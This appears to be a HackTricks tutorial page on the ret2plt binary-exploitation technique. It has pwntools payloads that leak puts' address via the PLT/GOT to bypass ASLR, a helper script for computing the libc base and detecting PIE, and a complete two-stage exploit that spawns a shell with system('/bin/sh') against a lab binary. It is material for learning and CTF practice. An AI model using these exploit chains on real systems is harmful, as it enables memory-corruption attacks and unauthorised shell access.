# Ret2plt

{{#include ../../../banners/hacktricks-training.md}}

## Basic Information

The goal of this technique is to **leak the address of a function via the PLT** in order to bypass ASLR. If, for example, you leak the address of the `puts` function from libc, you can then **calculate where the base of `libc` is** and add known offsets to reach other functions such as **`system`**.

This can be done with a `pwntools` payload like ([**from here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got)):

```python
# 32-bit ret2plt: arguments are passed on the stack (cdecl), so the layout is
# [padding][puts@plt][return address = main][argument = puts@got]
payload = flat(
    b'A' * padding,
    elf.plt['puts'],      # call puts through the PLT stub
    elf.symbols['main'],  # return to main afterwards so the process does not exit
    elf.got['puts']       # argument: address of the GOT entry of puts
)

# 64-bit: the first argument goes in RDI, so a `pop rdi; ret` gadget loads it
payload = flat(
    b'A' * padding,
    POP_RDI,              # pop rdi; ret gadget
    elf.got['puts'],      # RDI = address of the GOT entry of puts
    elf.plt['puts'],      # call puts through the PLT stub
    elf.symbols['main']   # return to main afterwards
)
```

Note how **`puts`** (called through its PLT address) is invoked with the address of the `puts` entry in the GOT (Global Offset Table) as its argument. When **`puts`** prints the contents of its own GOT entry, **that entry holds the real address of `puts` in memory**, because the dynamic linker has already resolved it.

Also note how the address of `main` is used in the exploit so that when **`puts`** finishes executing, **the binary calls `main` again instead of exiting** (so the leaked address stays valid for the second stage).

> [!CAUTION]
> Note how in order for this to work the **binary cannot be compiled with PIE** or you must have **found a leak to bypass PIE** in order to know the address of the PLT, GOT and main. Otherwise, you need to bypass PIE first.

You can find a [**full example of this bypass here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/ret2plt-aslr-bypass).
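The two things the text above relies on are the arithmetic that turns a leaked GOT value into a libc base, and the precondition in the caution (the binary must not be PIE, otherwise the PLT/GOT/`main` addresses are unknown). The following Python is an added example, not code from the page or from the linked write-ups, that shows both without pwntools: it unpacks the raw bytes `puts` printed, derives the libc base with a page-alignment sanity check (a wrong `puts` offset, for instance from a mismatched libc, is the usual reason a ret2plt second stage fails silently), resolves further symbols from the base, and reads the ELF header `e_type` field to tell `ET_EXEC` from `ET_DYN` (PIE). The leaked bytes, libc offsets and ELF headers are constructed inline for the example; the `ELF_MAGIC`, `ET_EXEC`, `ET_DYN` and header layout come from the ELF specification, not from the page.

```python
import struct

# Constants taken from the ELF specification (assumption of this example, not from the page).
ELF_MAGIC = b"\x7fELF"
ET_EXEC, ET_DYN = 2, 3
PAGE_SIZE = 0x1000


def unpack_leak(raw: bytes, bits: int) -> int:
    """Turn the bytes puts() printed from the GOT entry into an integer (like pwntools u32/u64)."""
    if bits == 32:
        return struct.unpack("<I", raw[:4])[0]
    if bits == 64:
        # puts() stops at the first NUL, so a 64-bit leak is usually 6 bytes; pad to 8.
        return struct.unpack("<Q", raw[:8].ljust(8, b"\x00"))[0]
    raise ValueError("bits must be 32 or 64")


def libc_base_from_leak(leaked_puts: int, puts_offset: int) -> int:
    """base = leaked address of puts - offset of puts inside libc.

    libc is mapped at a page-aligned address, so a base that is not page aligned means
    the offset does not belong to the libc actually loaded (wrong libc version/build).
    """
    base = leaked_puts - puts_offset
    if base % PAGE_SIZE != 0:
        raise ValueError(f"libc base {base:#x} is not page aligned; wrong puts offset?")
    return base


def resolve(base: int, offsets: dict) -> dict:
    """Rebase a table of libc symbol offsets onto the computed base."""
    return {name: base + off for name, off in offsets.items()}


def elf_is_pie(header: bytes) -> bool:
    """Return True if the ELF header's e_type is ET_DYN.

    For an executable, ET_DYN means it was linked as PIE, so its PLT/GOT/main addresses
    are randomised by ASLR and a plain ret2plt needs a separate leak first.
    """
    if len(header) < 18 or header[:4] != ELF_MAGIC:
        raise ValueError("not an ELF header")
    endian = "<" if header[5] == 1 else ">"          # EI_DATA: 1 = little, 2 = big endian
    e_type = struct.unpack(endian + "H", header[16:18])[0]
    return e_type == ET_DYN


def make_elf64_header(e_type: int) -> bytes:
    """Build a minimal, constructed 64-byte ELF64 little-endian header for the example."""
    e_ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELFCLASS64, little endian, version 1
    return e_ident + struct.pack(
        "<HHIQQQIHHHHHH",
        e_type, 0x3E, 1,      # e_type, e_machine (x86-64), e_version
        0x401000, 64, 0,      # e_entry, e_phoff, e_shoff
        0, 64, 56, 0,         # e_flags, e_ehsize, e_phentsize, e_phnum
        64, 0, 0,             # e_shentsize, e_shnum, e_shstrndx
    )


# Constructed sample values (not from a real run): the 4 bytes puts() printed and the
# offsets of puts/system inside the matching libc build.
SAMPLE_LEAK_32 = b"\xa0\x1b\xe3\xf7"
SAMPLE_OFFSETS = {"puts": 0x5FBA0, "system": 0x3ADA0}


def worked_example() -> dict:
    leaked = unpack_leak(SAMPLE_LEAK_32, 32)              # 0xf7e31ba0
    base = libc_base_from_leak(leaked, SAMPLE_OFFSETS["puts"])
    symbols = resolve(base, SAMPLE_OFFSETS)
    return {"leak": leaked, "base": base, **symbols}


if __name__ == "__main__":
    for name, value in worked_example().items():
        print(f"{name:>7}: {value:#x}")
    print("ET_EXEC header is PIE:", elf_is_pie(make_elf64_header(ET_EXEC)))
    print("ET_DYN  header is PIE:", elf_is_pie(make_elf64_header(ET_DYN)))
```

Note that `e_type` alone only distinguishes an executable from a position-independent one; a shared library is also `ET_DYN`, so apply the check to the main binary, not to libc.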
This was the final exploit from that **example**:

```python
from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvline()

# Stage 1: call puts(puts@got) and return to main to leak the real address of puts
payload = flat(
    'A' * 32,
    elf.plt['puts'],
    elf.sym['main'],
    elf.got['puts']
)

p.sendline(payload)

puts_leak = u32(p.recv(4))
p.recvlines(2)

# Derive the libc base from the leak and rebase the libc ELF on it
libc.address = puts_leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')

# Stage 2 (main was re-entered): ret2libc with system("/bin/sh") and a clean exit
payload = flat(
    'A' * 32,
    libc.sym['system'],
    libc.sym['exit'],
    next(libc.search(b'/bin/sh\x00'))
)

p.sendline(payload)

p.interactive()
```

## Other Examples & References

- [https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html)
  - 64 bit, ASLR enabled but no PIE. The first step is to fill the overflow up to the 0x00 byte of the canary and then call puts to leak it. With the canary, a ROP chain is built to call puts to leak the address of puts from the GOT, followed by a ROP chain to call `system('/bin/sh')`.
- [https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html)
  - 64 bits, ASLR enabled, no canary, stack overflow in main from a child function. A ROP chain calls puts to leak the address of puts from the GOT and then calls a one gadget.

{{#include ../../../banners/hacktricks-training.md}}